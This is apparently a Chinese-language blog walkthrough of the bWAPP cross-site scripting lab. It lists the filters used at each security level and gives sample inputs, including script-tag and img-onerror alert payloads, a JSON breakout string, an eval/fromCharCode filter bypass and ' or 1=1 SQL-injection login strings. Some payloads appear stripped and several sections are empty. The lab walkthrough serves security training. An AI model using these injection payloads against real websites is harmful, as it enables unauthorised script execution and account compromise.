BWAPP A3 - Cross-Site Scripting（XSS）

1. XSS - Reflected (GET)

xss_get.php

1. low

http://129.211.9.195:10200/xss_get.php?firstname=&lastname=222&form=submit

2. medium

addslashes
在某些字符前加上了反斜线。这些字符是单引号（'）、双引号（"）、反斜线（\）与 NUL（NULL 字符）。
http://129.211.9.195:10200/xss_get.php?firstname=&lastname=222&form=submit

3. high

htmlspecialchars
// '&' (ampersand) becomes '&' 
// '"' (double quote) becomes '"' when ENT_NOQUOTES is not set
// "'" (single quote) becomes ''' (or ') only when ENT_QUOTES is set
// '<' (less than) becomes '<'
// '>' (greater than) becomes '>'


Welcome <script>alert(636)</script> 222

2. XSS - Reflected (POST)

xss_post.php

同 1. XSS - Reflected (GET)

3. XSS - Reflected (JSON)

xss_json.php

1. low

1"}]}';alert(636)//
1"}]}';

2. medium

htmlspecialchars

3. high

htmlspecialchars

4. XSS - Reflected (AJAX/JSON)

xss_ajax_2-1.php

01.png

1. low

2. medium

3. high

我们可以使用 JSON.parse () 方法将数据转换为 JavaScript 对象。

5. XSS - Reflected (AJAX/XML)

xss_ajax_1-1.php
HTML字符实体
了解 HTML 的转义作用

1. low

<img src=0 onerror="alert(1)">

2. medium

<img src=0 onerror="alert(1)">

3. high

htmlspecialchars

6. XSS - Reflected (Back Button)

xss_back_button.php

1. low

进入该页面，刷新一次
点击 Go back 按钮
修改 refer 为 '">

02.png

2. medium

addslashes过滤，无法绕过

3. high

htmlspecialchars过滤，无法绕过

7. XSS - Reflected (Custom Header)

xss_custom_header.php

1. low

bWAPP:

03.png

2. medium

addslashes过滤，无法绕过

3. high

htmlspecialchars过滤，无法绕过

8. XSS - Reflected (Eval)

xss_eval.php

1. low

alert(636)

2. medium

alert(636)

04.png

eval(String.fromCharCode(97,108,101,114,116,40,47,120,115,115,47,41))

3. high

htmlspecialchars过滤，无法绕过

05.png

9. XSS - Reflected (HREF)

xss_href-1.php

1. low

1

06.png

2. medium

urlencode ( string $str ) : string
将字符串编码并将其用于 URL 的请求部分，同时它还便于将变量传递给下一页。

3. high

urlencode ( string $str ) : string
将字符串编码并将其用于 URL 的请求部分，同时它还便于将变量传递给下一页。

10. XSS - Reflected (Login Form)

xss_login.php

1. low

login=' or 1=1,""&password=1&form=submit
login=' or 1=1' &password=1&form=submit

2. medium

addslashes

3. high

mysql_real_escape_string () 函数
转义 SQL 语句中使用的字符串中的特殊字符。下列字符受影响：
\x00、\n、\r、\、'、"、\x1a

11. phpMyAdmin BBCode Tag XSS

xss_phpmyadmin.php

1. low

2. medium

3. high

12. XSS - Reflected (PHP_SELF)

xss_php_self.php

1. low

firstname=&lastname=2333&form=submit

2. medium

firstname=&lastname=2333&form=submit

3. high

htmlspecialchars

13. XSS - Reflected (Referer)

xss_referer.php

1. low

Referer:

07.png

08.png

2. medium

3. high

14. XSS - Reflected (User-Agent)

xss_user_agent.php

1. low

09.png

2. medium

10.png

3. high

htmlspecialchars

15. XSS - Stored (Blog)

xss_stored_1.php
输出编码

1. low

2. medium

addslashes

3. high

htmlspecialchars

16. XSS - Stored (Change Secret)

xss_stored_3.php

1. low

2. medium

3. high

17. XSS - Stored (Cookies)

1. low

http://129.211.9.195:10200/xss_stored_2.php?genre=123&form=like
修改genre可直接修改cookie

BWAPP A3 - Cross-Site Scripting（XSS）

1. XSS - Reflected (GET)

1. low

2. medium

3. high

2. XSS - Reflected (POST)

3. XSS - Reflected (JSON)

1. low

2. medium

3. high

4. XSS - Reflected (AJAX/JSON)

1. low

2. medium

3. high

5. XSS - Reflected (AJAX/XML)

1. low

2. medium

3. high

6. XSS - Reflected (Back Button)

1. low

2. medium

3. high

7. XSS - Reflected (Custom Header)

1. low

2. medium

3. high

8. XSS - Reflected (Eval)

1. low

2. medium

3. high

9. XSS - Reflected (HREF)

1. low

2. medium

3. high

10. XSS - Reflected (Login Form)

1. low

2. medium

3. high

11. phpMyAdmin BBCode Tag XSS

1. low

2. medium

3. high

12. XSS - Reflected (PHP_SELF)

1. low

2. medium

3. high

13. XSS - Reflected (Referer)

1. low

2. medium

3. high

14. XSS - Reflected (User-Agent)

1. low

2. medium

3. high

15. XSS - Stored (Blog)

1. low

2. medium

3. high

16. XSS - Stored (Change Secret)

1. low

2. medium

3. high

17. XSS - Stored (Cookies)

1. low

2. medium

3. high

18. SQLiteManager XSS

1. low

2. medium

3. high

19. XSS - Stored (User-Agent)

1. low

2. medium

3. high

你可能感兴趣的:(BWAPP A3 - Cross-Site Scripting（XSS）)